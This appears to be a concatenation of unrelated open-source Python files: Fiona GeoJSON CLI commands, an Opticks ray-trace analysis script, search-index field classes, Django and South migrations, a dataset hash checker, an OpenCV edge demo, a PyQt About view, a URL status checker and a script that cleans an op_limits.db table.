                            i, exc)
                    else:
                        logger.critical(
                            "failed to serialize file record %d (%s), "
                            "quiting",
                            i, exc)
                        sink.write("]")
                        sink.write(tail)
                        if indented:
                            sink.write("\n")
                        raise
            # Close up the GeoJSON after writing all features.
            sink.write("]")
            sink.write(tail)
            if indented:
                sink.write("\n")
        else:
            # Buffer GeoJSON data at the collection level. The default.
            collection = {'type': 'FeatureCollection'}
            if with_ld_context:
                collection['@context'] = make_ld_context(
                    add_ld_context_item)
                collection['features'] = [
                    id_record(rec) for rec in source]
            else:
                collection['features'] = list(source)
            json.dump(collection, sink, **dump_kwds)
            sink.write("\n")
    except Exception:
        logger.exception("Exception caught during processing")
        raise click.Abort()
# Distribute command
@click.command(short_help="Distribute features from a collection")
@use_rs_opt
@click.pass_context
def distrib(ctx, use_rs):
    """Print the features of GeoJSON objects read from stdin.

    Feature collections are unpacked: each member feature is echoed on its
    own line, annotated with a ``parent`` pointing at the collection id and
    given a default ``id`` when it has none.
    """
    verbosity = (ctx.obj and ctx.obj['verbosity']) or 2
    logger = logging.getLogger('fio')
    stdin = click.get_text_stream('stdin')
    try:
        source = obj_gen(stdin)
        for i, obj in enumerate(source):
            obj_id = obj.get('id', 'collection:' + str(i))
            features = obj.get('features') or [obj]
            for j, feat in enumerate(features):
                if obj.get('type') == 'FeatureCollection':
                    feat['parent'] = obj_id
                # Bug fix: the default id previously used the collection
                # index `i`, so every feature of a collection got the same
                # id; use the feature index `j` instead.
                feat_id = feat.get('id', 'feature:' + str(j))
                feat['id'] = feat_id
                if use_rs:
                    # ASCII record separator for RS-delimited output.
                    click.echo(u'\u001e', nl=False)
                click.echo(json.dumps(feat))
    except Exception:
        logger.exception("Exception caught during processing")
        raise click.Abort()
# Dump command
@click.command(short_help="Dump a dataset to GeoJSON.")
@click.argument('input', type=click.Path(), required=True)
@click.option('--encoding', help="Specify encoding of the input file.")
@precision_opt
@indent_opt
@compact_opt
@click.option('--record-buffered/--no-record-buffered', default=False,
              help="Economical buffering of writes at record, not collection "
                   "(default), level.")
@click.option('--ignore-errors/--no-ignore-errors', default=False,
              help="log errors but do not stop serialization.")
@click.option('--with-ld-context/--without-ld-context', default=False,
              help="add a JSON-LD context to JSON output.")
@click.option('--add-ld-context-item', multiple=True,
              help="map a term to a URI and add it to the output's JSON LD context.")
@click.pass_context
def dump(ctx, input, encoding, precision, indent, compact, record_buffered,
         ignore_errors, with_ld_context, add_ld_context_item):
    """Dump a dataset either as a GeoJSON feature collection (the default)
    or a sequence of GeoJSON features."""
    verbosity = (ctx.obj and ctx.obj['verbosity']) or 2
    logger = logging.getLogger('fio')
    sink = click.get_text_stream('stdout')
    dump_kwds = {'sort_keys': True}
    if indent:
        dump_kwds['indent'] = indent
    if compact:
        dump_kwds['separators'] = (',', ':')
    item_sep = compact and ',' or ', '
    open_kwds = {}
    if encoding:
        open_kwds['encoding'] = encoding
    def transformer(crs, feat):
        """Reproject *feat*'s geometry from *crs* to WGS84 in place and
        return the feature."""
        tg = partial(transform_geom, crs, 'EPSG:4326',
                     antimeridian_cutting=True, precision=precision)
        feat['geometry'] = tg(feat['geometry'])
        return feat
    try:
        with fiona.drivers(CPL_DEBUG=verbosity>2):
            with fiona.open(input, **open_kwds) as source:
                meta = source.meta
                meta['fields'] = dict(source.schema['properties'].items())
                if record_buffered:
                    # Buffer GeoJSON data at the feature level for smaller
                    # memory footprint.
                    indented = bool(indent)
                    rec_indent = "\n" + " " * (2 * (indent or 0))
                    collection = {
                        'type': 'FeatureCollection',
                        'fiona:schema': meta['schema'],
                        'fiona:crs': meta['crs'],
                        'features': [] }
                    if with_ld_context:
                        collection['@context'] = make_ld_context(
                            add_ld_context_item)
                    # Split the serialized skeleton at the empty features
                    # array so features can be streamed between head/tail.
                    head, tail = json.dumps(collection, **dump_kwds).split('[]')
                    sink.write(head)
                    sink.write("[")
                    itr = iter(source)
                    # Try the first record.
                    try:
                        i, first = 0, next(itr)
                        # Bug fix: transformer takes (crs, feat); the
                        # original called it with one argument here, which
                        # raised TypeError in the record-buffered path.
                        first = transformer(source.crs, first)
                        if with_ld_context:
                            first = id_record(first)
                        if indented:
                            sink.write(rec_indent)
                        sink.write(
                            json.dumps(first, **dump_kwds
                                ).replace("\n", rec_indent))
                    except StopIteration:
                        pass
                    except Exception as exc:
                        # Ignoring errors is *not* the default.
                        if ignore_errors:
                            logger.error(
                                "failed to serialize file record %d (%s), "
                                "continuing",
                                i, exc)
                        else:
                            # Log error and close up the GeoJSON, leaving it
                            # more or less valid no matter what happens above.
                            logger.critical(
                                "failed to serialize file record %d (%s), "
                                "quiting",
                                i, exc)
                            sink.write("]")
                            sink.write(tail)
                            if indented:
                                sink.write("\n")
                            raise
                    # Because trailing commas aren't valid in JSON arrays
                    # we'll write the item separator before each of the
                    # remaining features.
                    for i, rec in enumerate(itr, 1):
                        # Bug fix: same single-argument call as above.
                        rec = transformer(source.crs, rec)
                        try:
                            if with_ld_context:
                                rec = id_record(rec)
                            if indented:
                                sink.write(rec_indent)
                            sink.write(item_sep)
                            sink.write(
                                json.dumps(rec, **dump_kwds
                                    ).replace("\n", rec_indent))
                        except Exception as exc:
                            if ignore_errors:
                                logger.error(
                                    "failed to serialize file record %d (%s), "
                                    "continuing",
                                    i, exc)
                            else:
                                logger.critical(
                                    "failed to serialize file record %d (%s), "
                                    "quiting",
                                    i, exc)
                                sink.write("]")
                                sink.write(tail)
                                if indented:
                                    sink.write("\n")
                                raise
                    # Close up the GeoJSON after writing all features.
                    sink.write("]")
                    sink.write(tail)
                    if indented:
                        sink.write("\n")
                else:
                    # Buffer GeoJSON data at the collection level. The default.
                    collection = {
                        'type': 'FeatureCollection',
                        'fiona:schema': meta['schema'],
                        'fiona:crs': meta['crs']}
                    if with_ld_context:
                        collection['@context'] = make_ld_context(
                            add_ld_context_item)
                        # Keep the call signature consistent with the fixed
                        # buffered path above.
                        collection['features'] = [
                            id_record(transformer(source.crs, rec)) for rec in source]
                    else:
                        collection['features'] = [transformer(source.crs, rec) for rec in source]
                    json.dump(collection, sink, **dump_kwds)
    except Exception:
        logger.exception("Exception caught during processing")
        raise click.Abort()
# Load command.
@click.command(short_help="Load GeoJSON to a dataset in another format.")
@click.argument('output', type=click.Path(), required=True)
@click.option('-f', '--format', '--driver', required=True,
              help="Output format driver name.")
@options.src_crs_opt
@click.option(
    '--dst-crs', '--dst_crs',
    help="Destination CRS.  Defaults to --src-crs when not given.")
@click.option(
    '--sequence / --no-sequence', default=False,
    help="Specify whether the input stream is a LF-delimited sequence of GeoJSON "
         "features (the default) or a single GeoJSON feature collection.")
@click.pass_context
def load(ctx, output, driver, src_crs, dst_crs, sequence):
    """Load features from JSON to a file in another format.

    The input is a GeoJSON feature collection or optionally a sequence of
    GeoJSON feature objects."""
    verbosity = (ctx.obj and ctx.obj['verbosity']) or 2
    logger = logging.getLogger('fio')
    stdin = click.get_text_stream('stdin')
    dst_crs = dst_crs or src_crs
    # Reproject only when both CRSs are known and differ.
    if src_crs and dst_crs and src_crs != dst_crs:
        transformer = partial(transform_geom, src_crs, dst_crs,
                              antimeridian_cutting=True, precision=-1)
    else:
        transformer = lambda x: x
    first_line = next(stdin)
    # If input is RS-delimited JSON sequence.
    if first_line.startswith(u'\x1e'):
        def feature_gen():
            # Accumulate text between ASCII RS (0x1e) markers; each buffered
            # chunk is one feature document.
            buffer = first_line.strip(u'\x1e')
            for line in stdin:
                if line.startswith(u'\x1e'):
                    if buffer:
                        feat = json.loads(buffer)
                        feat['geometry'] = transformer(feat['geometry'])
                        yield feat
                    buffer = line.strip(u'\x1e')
                else:
                    buffer += line
            else:
                # Flush the final buffered feature at EOF.
                feat = json.loads(buffer)
                feat['geometry'] = transformer(feat['geometry'])
                yield feat
    elif sequence:
        def feature_gen():
            # NOTE(review): the first feature is yielded without running its
            # geometry through `transformer`, unlike every other branch —
            # confirm whether this is intentional.
            yield json.loads(first_line)
            for line in stdin:
                feat = json.loads(line)
                feat['geometry'] = transformer(feat['geometry'])
                yield feat
    else:
        def feature_gen():
            # Single feature collection: parse the whole stream at once.
            text = "".join(itertools.chain([first_line], stdin))
            for feat in json.loads(text)['features']:
                feat['geometry'] = transformer(feat['geometry'])
                yield feat
    try:
        source = feature_gen()
        # Use schema of first feature as a template.
        # TODO: schema specified on command line?
        first = next(source)
        schema = {'geometry': first['geometry']['type']}
        # Map Python property types back to fiona field type names,
        # defaulting to 'str' for unknown types.
        schema['properties'] = dict([
            (k, FIELD_TYPES_MAP_REV.get(type(v)) or 'str')
            for k, v in first['properties'].items()])
        with fiona.drivers(CPL_DEBUG=verbosity>2):
            with fiona.open(
                    output, 'w',
                    driver=driver,
                    crs=dst_crs,
                    schema=schema) as dst:
                dst.write(first)
                dst.writerecords(source)
    except Exception:
        logger.exception("Exception caught during processing")
        raise click.Abort()
|
#!/usr/bin/env python
#
# Copyright (c) 2019 Opticks Team. All Rights Reserved.
#
# This file is part of Opticks
# (see https://bitbucket.org/simoncblyth/opticks).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
tboolean.py: CSG boolean geometry tracetest
=======================================================
For analysis of photon_buffer written by oxrap/cu/generate.cu:tracetest
which is intended for testing geometrical intersection only, with
no propagation.
Unsigned boundaries 1 and 124 all from CSG intersection, the 215 was a
abitrary marker written by evaluative_csg::
In [43]: flg[:100]
Out[43]:
A()sliced
A([[ 0, 0, 1, 215],
[ 0, 0, 123, 0],
[ 0, 0, 1, 215],
[ 0, 0, 123, 0],
[ 0, 0, 123, 0],
[ 0, 0, 1, 215],
[ 0, 0, 123, 0],
[ 0, 0, 1, 215],
[ 0, 0, 123, 0],
[ 0, 0, 123, 0],
[ 0, 0, 123, 0],
[ 0, 0, 1, 215],
[ 0, 0, 123, 0],
[ 0, 0, 124, 215],
[ 0, 0, 1, 215],
[ 0, 0, 1, 215],
[ 0, 0, 1, 215],
[ 0, 0, 1, 215],
[ 0, 0, 1, 215],
[ 0, 0, 1, 215],
In [46]: np.unique(flg[flg[:,3] == 215][:,2])
Out[46]:
A()sliced
A([ 1, 124], dtype=uint32)
In [48]: count_unique_sorted(flg[:,2]) # unsigned 0-based boundaries
Out[48]:
array([[ 1, 58822],
[ 123, 35537],
[ 124, 5641]], dtype=uint64)
In [57]: t0[np.where(flg[:,2] == 1)]
A([ 149.8889, 149.8889, 349.8889, ..., 348.1284, 349.8889, 349.8889], dtype=float32)
In [58]: t0[np.where(flg[:,2] == 124)]
A([ 51.6622, 47.394 , 61.4086, ..., 61.0178, 66.7235, 47.1538], dtype=float32)
In [59]: t0[np.where(flg[:,2] == 123)]
A([ 1400. , 1400. , 1400. , ..., 2021.8895, 1400. , 1400. ], dtype=float32)
::
In [13]: count_unique(ib) # signed 1-based boundaries encode inner/outer
Out[13]:
array([[ -125., 4696.],
[ -2., 58316.],
[ 2., 506.],
[ 124., 35537.],
[ 125., 945.]])
In [35]: count_unique(ub) # unsigned 0-based boundaries, for lookup against the blib, 58316 + 506 = 58822, 4696 + 945 = 5641
Out[35]:
array([[ 1, 58822],
[ 123, 35537],
[ 124, 5641]], dtype=uint64)
In [33]: print "\n".join(["%3d : %s " % (i, n) for i,n in enumerate(blib.names)])
0 : Vacuum///Vacuum
1 : Vacuum///Rock
2 : Rock///Air
3 : Air/NearPoolCoverSurface//PPE
4 : Air///Aluminium
5 : Aluminium///Foam
6 : Foam///Bakelite
...
119 : OwsWater/NearOutInPiperSurface//PVC
120 : OwsWater/NearOutOutPiperSurface//PVC
121 : DeadWater/LegInDeadTubSurface//ADTableStainlessSteel
122 : Rock///RadRock
"""
import os, sys, logging, numpy as np
log = logging.getLogger(__name__)
import matplotlib.pyplot as plt
#from opticks.ana.nbase import count_unique_sorted # doenst work with signed
from opticks.ana.nbase import count_unique
from opticks.ana.evt import Evt
from opticks.ana.proplib import PropLib
X,Y,Z,W = 0,1,2,3
if __name__ == '__main__':
    from opticks.ana.main import opticks_main
    #args = opticks_main(tag="1", det="boolean", src="torch")
    ok = opticks_main()

    blib = PropLib("GBndLib")
    evt = Evt(tag=ok.tag, det=ok.det, src=ok.src, pfx=ok.pfx, args=ok)
    if not evt.valid:
        # Bug fix: `args` was undefined here (left over from the
        # commented-out call above); report the parsed options instead.
        log.fatal("failed to load evt %s " % repr(ok))
        sys.exit(1)

    ox = evt.ox
    ## assume layout written by oxrap/cu/generate.cu:tracetest ##
    p0 = ox[:,0,:W]                  # start position (used as origin in p1 below)
    d0 = ox[:,1,:W]                  # direction
    t0 = ox[:,1,W]                   # parametric distance to intersect
    flg = ox[:,3].view(np.uint32)    # per-photon flag words (see module docstring)

    p1 = p0 + np.repeat(t0,3).reshape(-1,3)*d0   # intersect position

    ub = flg[:,2]                    # unsigned 0-based boundary (for blib lookup)
    ib = ox[:,2,W].view(np.int32)    # signed 1-based boundary (encodes inner/outer)

    # Boundary index to plot; alternatives kept for quick switching.
    b = 1
    #b = 123
    #b = 124
    thin = slice(0,None,100)
    s = np.where(ub == b)[0]

    plt.ion()
    plt.close()
    #plt.scatter( p0[s,X], p0[s,Y] )
    plt.scatter( p1[s,X], p1[s,Y] )   # scatter of intersect positions on boundary b
    plt.show()
|
#
# (C) 2013 Varun Mittal <varunmittal91@gmail.com>
# JARVIS program is distributed under the terms of the GNU General Public License v3
#
# This file is part of JARVIS.
#
# JARVIS is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation version 3 of the License.
#
# JARVIS is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with JARVIS. If not, see <http://www.gnu.org/licenses/>.
#
import re
from uuid import uuid4
from datetime import datetime
from .exceptions import IncompleteParameters
# Stop words are loaded once at import time from the bundled word lists.
stop_words = []
lists = ['en.list']
for list_name in lists:
    # Use a context manager so the file handle is closed (the original
    # leaked it), and avoid shadowing the builtins `list` and `file`.
    with open("jarvis_search/stop_word_list/%s" % list_name, "r") as word_file:
        words = word_file.read().split('\n')
    # Normalise: lowercase and strip everything but letters, digits and "'".
    words = [re.sub('[^a-zA-Z0-9\']', '', word.lower()) for word in words]
    stop_words.extend(words)
class EsSearchDocument:
    """A document destined for an ES-style index.

    Collects the supplied field objects into a ``body`` mapping (plus a
    ``_rank`` entry) and exposes the full indexing configuration through
    ``getDoc``.  Raises ``IncompleteParameters`` when ``fields``, ``id``
    or ``doc_type`` is missing or empty.
    """

    def __init__(self, **kwargs):
        self.rank = kwargs.get('rank', datetime.now())
        self.__config = {
            'body': kwargs.get('fields'),
            'id': kwargs.get('id', str(uuid4())),
            'doc_type': kwargs.get('doc_type'),
        }
        # Every config value must be truthy before we build the body.
        if not all(self.__config.values()):
            raise IncompleteParameters(self.__config)
        body = dict((field.name, field.value) for field in kwargs.get('fields'))
        body['_rank'] = self.rank
        self.__config['body'] = body
        self.doc_id = self.__config['id']

    def getDoc(self, index_name):
        """Attach *index_name* and return the full indexing config dict."""
        self.__config['index'] = index_name
        return self.__config

    def __getitem__(self, name):
        """Look up a field value from the document body (None when absent)."""
        return self.__config['body'].get(name)

    def __repr__(self):
        return str(self.__config)
class EsFieldBase:
    """Base class for index fields: a simple (name, value) pair.

    NOTE(review): the ``language`` parameter is accepted but currently
    unused — confirm whether per-field language support was intended.
    """

    def __init__(self, name, value, language=None):
        self.name, self.value = name, value

    def __repr__(self):
        return "%s:%s" % (self.name, self.value)
def tokenize_string(phrase):
    """Expand *phrase* into search tokens.

    Each whitespace-delimited word is expanded into all of its substrings
    of length 3 .. len(word)-1 (a simple n-gram expansion for infix
    search).  Words longer than 12 characters or present in ``stop_words``
    are not expanded; the original words themselves are always appended
    at the end.
    """
    tokens = []
    for word in phrase.split():
        if len(word) > 12 or word in stop_words:
            continue
        # `range` instead of the Python-2-only `xrange`: behaviour is
        # identical when iterating, and it keeps the helper Python-3
        # compatible.
        for size in range(3, len(word)):
            for start in range(0, len(word) - size + 1):
                tokens.append(word[start:start + size])
    tokens.extend(phrase.split())
    return tokens
class EsStringField(EsFieldBase):
    """A string field whose value is n-gram tokenized before storage."""

    def __init__(self, **kwargs):
        raw = kwargs.get('value', "")
        kwargs['value'] = " ".join(tokenize_string(raw))
        EsFieldBase.__init__(self, **kwargs)
class EsTextField(EsFieldBase): pass
class EsArrayField(EsFieldBase):
    """A field whose value must be a list.

    Bug fixes relative to the original:
    * ``assert(type(x), list)`` asserted a two-element tuple, which is
      always truthy — the type check never actually ran.  Replaced with
      ``isinstance``.
    * ``EsFieldBase.__init__`` was never invoked, leaving instances without
      ``name``/``value`` attributes (inconsistent with the sibling fields).
    """

    def __init__(self, **kwargs):
        assert isinstance(kwargs.get('value', []), list), \
            "EsArrayField value must be a list"
        EsFieldBase.__init__(self, **kwargs)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2018-06-12 21:15
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
import django.utils.timezone
class Migration(migrations.Migration):
    # Auto-generated Django migration (Django 1.11.5, 2018-06-12).
    #
    # Adds ``MediaProjeto.significado`` and re-captures the DateTimeField
    # defaults.  NOTE(review): the one-off default for ``significado`` is
    # ``django.utils.timezone.now`` on a TextField — presumably an artefact
    # of answering makemigrations' interactive default prompt; the hardcoded
    # ``datetime(2018, 6, 12, ...)`` values below are the timestamps captured
    # when the migration was generated (``preserve_default`` semantics apply).

    dependencies = [
        ('board', '0002_auto_20180518_1625'),
    ]
    operations = [
        migrations.AddField(
            model_name='mediaprojeto',
            name='significado',
            field=models.TextField(default=django.utils.timezone.now),
            preserve_default=False,
        ),
        migrations.AlterField(
            model_name='board',
            name='data_criacao',
            field=models.DateTimeField(default=datetime.datetime(2018, 6, 12, 21, 14, 56, 739648, tzinfo=utc), verbose_name='Submetido'),
        ),
        migrations.AlterField(
            model_name='board',
            name='data_ultima_modificacao',
            field=models.DateTimeField(default=datetime.datetime(2018, 6, 12, 21, 14, 56, 739648, tzinfo=utc), verbose_name='Modificado'),
        ),
        migrations.AlterField(
            model_name='board',
            name='pub_date',
            field=models.DateTimeField(default=datetime.datetime(2018, 6, 12, 21, 14, 56, 739648, tzinfo=utc), verbose_name='Publicado'),
        ),
        migrations.AlterField(
            model_name='mediaprojeto',
            name='data_criacao',
            field=models.DateTimeField(default=datetime.datetime(2018, 6, 12, 21, 14, 56, 740649, tzinfo=utc), verbose_name='Submetido'),
        ),
        migrations.AlterField(
            model_name='mediaprojeto',
            name='ordem',
            field=models.IntegerField(default=-1, verbose_name='Ordem'),
        ),
    ]
|
from pathlib import Path
from datasets import load_dataset, Dataset
from datasets.config import HF_DATASETS_CACHE
from . import registration
from ..utils import get_hash
_OOV_DELIMITER = '|'
def get_gold_dataset(challenge_name: str, ignore_verification: bool = False):
    """Load the gold (answers) test split for *challenge_name*.

    The dataset is loaded through the local ``challenge`` Huggingface
    dataset script with the ``{challenge_name}-answers`` configuration.
    Unless *ignore_verification* is set (or the registered spec carries no
    hash), the dataset's content hash is verified against the spec from
    the challenge registry; a mismatch raises ``ValueError`` with advice
    to clear the Huggingface datasets cache.
    """
    d = load_dataset(
        str((Path(__file__).parent.parent / 'hf_datasets_scripts' / 'challenge').resolve()),
        name=f'{challenge_name}-answers',
        split='test',
    )
    challenge_spec = registration.registry.get_spec(challenge_name)
    if not ignore_verification and challenge_spec.hash is not None:
        h = get_challenge_hash(d)
        if challenge_spec.hash != h:
            raise ValueError(wrong_hash_message.format(
                hash=h,
                expected_hash=challenge_spec.hash,
                challenge=challenge_name,
            ))
    return d
def get_challenge_hash(
    dataset: Dataset,
    test_only: bool = True,
    hash_col: str = 'hashed_id',
    delimiter: str = _OOV_DELIMITER,
):
    """Compute a content hash over *dataset*'s *hash_col* column.

    When *test_only* is set and the dataset carries an ``is_train``
    feature, training rows are filtered out first.  The remaining column
    values are joined with *delimiter* and passed to ``get_hash``.
    """
    def _keep_test_rows(row):
        return not row['is_train']

    if test_only and 'is_train' in dataset.features:
        dataset = dataset.filter(_keep_test_rows)
    joined = delimiter.join(dataset[hash_col])
    return get_hash(joined)
wrong_hash_message = (
'Hash for challenge {challenge} ({hash}) different from expected hash ({expected_hash}).'
f' Please clear your Huggingface datasets cache ({HF_DATASETS_CACHE}) and try again.'
)
|
import cv2
import numpy as np
import argparse
# Parse the required --image path from the command line.
ap=argparse.ArgumentParser()
ap.add_argument('-i','--image',required=True,help='Path to the image')
args=vars(ap.parse_args())
# Load the image, convert to grayscale, and smooth with a 5x5 Gaussian
# kernel to suppress noise before edge detection.
image=cv2.imread(args['image'])
image=cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
image=cv2.GaussianBlur(image,(5,5),0)
cv2.imshow('Blurred',image)
# Canny edge detection with hysteresis thresholds 30 (low) / 150 (high).
canny=cv2.Canny(image,30,150)
cv2.imshow('Canny',canny)
# Block until a key press so the display windows stay open.
cv2.waitKey(0)
|
import os
import sys
from PyQt4.Qt import *
class AboutView(object):
    """Builds the 'About' tab contents: a left column with sponsor
    logos/captions and a right column with the about text, appended to
    the parent layout passed to the constructor."""

    # Class-level defaults; replaced per instance in __init__/__initLayouts.
    __layout = None
    __leftBox = None
    __rightBox = None

    def __init__(self, layout):
        # layout: parent Qt layout that this view's rows are added to.
        self.__layout = layout

    def initView(self):
        """Populate the view: create the layouts, then add logos and text."""
        self.__initLayouts()
        self.__initPixelMap(self.__leftBox, "VU_icon.svg")
        self.__initText(self.__leftBox, "App sponsored by: ")
        self.__initPixelMap(self.__leftBox, "opto.jpg")
        self.__initText(self.__rightBox, "About this app")

    def __initLayouts(self):
        # Two vertical columns placed side by side in one horizontal box.
        hBox = QHBoxLayout()
        self.__leftBox = QVBoxLayout()
        self.__leftBox.setAlignment(Qt.AlignCenter)
        self.__rightBox = QVBoxLayout()
        hBox.addLayout(self.__leftBox)
        hBox.addLayout(self.__rightBox)
        self.__layout.addLayout(hBox)

    @staticmethod
    def __initPixelMap(layout, logoName):
        # Image files are resolved relative to this module's directory.
        pathToLogo = os.path.join(os.path.dirname(sys.modules[__name__].__file__), logoName)
        label = QLabel()
        pixelMap = QPixmap(pathToLogo)
        label.setPixmap(pixelMap)
        layout.addWidget(label)

    @staticmethod
    def __initText(layout, text):
        # Plain caption label appended to the given column.
        label = QLabel()
        label.setText(text)
        layout.addWidget(label)
|
import pycurl
from StringIO import StringIO
for line in open('sites.txt').xreadlines():
buffer = StringIO()
c = pycurl.Curl()
c.setopt(c.URL, line.rstrip())
c.setopt(c.WRITEDATA, buffer)
c.perform()
print line + " status code: %s" % c.getinfo(pycurl.HTTP_CODE)
c.close()
# Body is a string in some encoding.
# In Python 2, we can print it without knowing what the encoding is.
#
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Proposal.created'
db.add_column(u'landing_proposal', 'created',
self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, default=datetime.datetime(2014, 12, 15, 0, 0), blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Proposal.created'
db.delete_column(u'landing_proposal', 'created')
models = {
u'landing.proposal': {
'Meta': {'object_name': 'Proposal'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '400', 'null': 'True', 'blank': 'True'}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '20'}),
'tour': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['landing.Tour']", 'null': 'True', 'blank': 'True'})
},
u'landing.tour': {
'Meta': {'object_name': 'Tour'},
'aboutHotel': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'dateDeparture': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nameHotel': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'nameTour': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'picture': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'piece': ('django.db.models.fields.IntegerField', [], {}),
'starHotel': ('django.db.models.fields.IntegerField', [], {}),
'time': ('django.db.models.fields.CharField', [], {'max_length': '250'})
}
}
complete_apps = ['landing']
|
#!/usr/bin/env /data/mta/Script/Python3.8/envs/ska3-shiny/bin/python
#################################################################################
# #
# clean_table.py: clean up op_limits.db table #
# #
# author: t. isobe (tisobe@cfa.harvard.edu) #
# #
# last update: Mar 10, 2021 #
# #
#################################################################################
import os
import sys
import re
import string
import time
import random
import math
#
#--- reading directory list
#
path = '/data/mta/Script/MSID_limit/Scripts/house_keeping/dir_list'
with open(path, 'r') as f:
    data = [line.strip() for line in f.readlines()]

# Each dir_list line is "<value> : <variable>"; the exec binds <variable>
# (e.g. main_dir, mta_dir) at module scope.  The value text is exec'd
# verbatim, so dir_list presumably quotes its path strings — TODO confirm.
# NOTE(review): exec on config-file contents is safe only while dir_list
# remains under local control.
for ent in data:
    atemp = re.split(':', ent)
    var = atemp[1].strip()
    line = atemp[0].strip()
    exec("%s = %s" %(var, line))

sys.path.append(mta_dir)
import mta_common_functions as mcf

# Unique scratch-file path for temporary command output.
rtail = int(time.time() * random.random())
zspace = '/tmp/zspace' + str(rtail)
#
#--- database file name
#
db_file = main_dir + 'op_limits.db'
#-------------------------------------------------------------------------------
#-- clean_table: clean up op_limits.db -
#-------------------------------------------------------------------------------
def clean_table():
    """
    clean up op_limits.db: normalise column delimiters, then de-duplicate
    and time-order the entries of each msid.
    input:  op_limits.db (path in module-level db_file)
    output: cleaned up op_limits.db, also copied to /data/mta4/MTA/data/op_limits/
    """
#
#--- if the change was a made a while ago, don't clean up
#
    current = time.time()
    updated = os.path.getmtime(db_file)
    diff    = current - updated
    if diff > 1800:
        # Database untouched for >30 min: nothing new to clean.
        # NOTE(review): builtin exit() — sys.exit(1) is the conventional form.
        exit(1)
#
#--- first, correct data format; the data part is delimited by tab, not a space
#
    data = mcf.read_data_file(db_file)
    save = []
    for ent in data:
        if ent == '':
            save.append('')
        elif ent[0] == '#':
            # Comment lines pass through unchanged.
            save.append(ent)
            continue
        else:
            # Split off a trailing "#..." comment, then re-emit the data
            # columns tab-delimited with fixed decimal formatting.
            atemp = re.split('#', ent)
            btemp = re.split('\s+', atemp[0])
            # Short msid names get an extra tab for column alignment.
            if len(btemp[0]) < 8:
                line =btemp[0].strip() + '\t\t'
            else:
                line =btemp[0].strip() + '\t'
            line = line + '%0.2f\t' % round(float(btemp[1].strip()), 2)
            line = line + '%0.2f\t' % round(float(btemp[2].strip()), 2)
            line = line + '%0.2f\t' % round(float(btemp[3].strip()), 2)
            line = line + '%0.2f\t' % round(float(btemp[4].strip()), 2)
            # Last column (time) is written with one decimal place.
            line = line + '%0.1f\t' % round(float(btemp[5].strip()), 2)
            try:
                # Re-attach the original trailing comment, if any.
                line = line + '#' + atemp[1]
            except:
                pass
            save.append(line)
#
#--- now reorder each msid entry by time and remove duplicates
#
    msid_list = []
    prev      = ''
    m_dict    = {}
#
#--- first collect all entries of each msid and create msid list and disctionary
#--- with msid as a key. the dict points to a lists holds all entries of each msid
#
    for ent in save:
        if ent == '':
            continue

        chk = 0
        if ent[0] == '#':
            continue
        else:
            atemp = re.split('\s+', ent)
            msid  = atemp[0]
            try:
                out = m_dict[msid]
            except:
                out = []
            out.append(ent)
            m_dict[msid] = out
            if msid != prev:
                if msid in msid_list:
                    continue
                else:
                    if not (msid in msid_list):
                        msid_list.append(msid)
                    prev = msid
                    continue
            else:
                continue
#
#--- go through each msid/dict entry and remove duplicate and sort in time order
#
    for msid in msid_list:
        t_dict = {}
        t_list = []
        for ent in m_dict[msid]:
            atemp = re.split('\t+', ent)
            stime = float(atemp[5])
            t_dict[stime] = ent
            t_list.append(stime)

        # set() drops duplicate timestamps; sorted() restores time order.
        t_list = sorted(list(set(t_list)))

        out = []
        for stime in t_list:
            out.append(t_dict[stime])

        m_dict[msid] = out
#
#--- back to the table and print create a clean table
#
    line = ''
    prev = ''
    done = []
    for ent in data:
        if ent == '':
            line = line + '\n'
        elif ent[0] == '#':
            line = line + ent + '\n'
            continue
        else:
            atemp = re.split('\s+', ent)
            msid  = atemp[0].replace('#', '')
            if msid == prev:
                continue
            if msid in done:
                prev = msid
                continue
            # First occurrence of this msid: emit its full cleaned,
            # time-ordered entry list in place.
            done.append(msid)
            out  = m_dict[msid]
            for val in out:
                line = line + val + '\n'
            prev = msid
#
#--- update the op_limits.db
#
    # Keep a backup of the previous version as op_limits.db~ .
    cmd = 'mv ' + db_file + ' ' + db_file + '~'
    os.system(cmd)

    with open(db_file, 'w') as fo:
        fo.write(line)

    cmd = 'cp -f ' + db_file + ' /data/mta4/MTA/data/op_limits/op_limits.db'
    os.system(cmd)
#-------------------------------------------------------------------------------
#-- check_entry: check whether new op_limit.db is missing any entries from the older data set
#-------------------------------------------------------------------------------
def check_entry():
    """
    check whether new op_limit.db is missing any entries from the older data set
    input:  none but read from <past_dir>/op_limits.db_<mmddyy>
    output: email notification sent out if it find a missing data
    """
